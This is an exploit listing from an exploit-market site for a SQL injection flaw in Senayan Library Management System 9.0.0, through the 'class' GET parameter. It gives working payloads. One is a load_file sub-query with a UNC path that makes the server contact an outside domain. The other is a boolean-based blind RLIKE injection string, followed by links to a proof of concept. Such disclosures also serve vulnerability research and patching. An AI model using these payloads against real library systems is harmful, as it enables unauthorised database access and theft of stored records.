[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Senayan Library Management System 9.0.0 SQL Injection Vulnerability

Author
nu11secur1ty
Risk
[
Security Risk High
]
0day-ID
0day-ID-38102
Category
web applications
Date add
10-12-2022
Platform
php
## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9 SQLi
## Author: nu11secur1ty
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi

## Description:
The manual insertion `point 3` with `class` parameter appears to be
vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'
was submitted in the manual insertion point 3.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.

## STATUS: HIGH Vulnerability

[+] Payload:

```MySQL
---
Parameter: class (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
    Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT
(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND
'dLjf'='dLjf&membershipType=a&collType=aaaa
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)

## Proof and Exploit:
[href](http://localhost:5001/sy5wji)

## Time spent
`03:00:00`

#  0day.today [2024-03-29]  #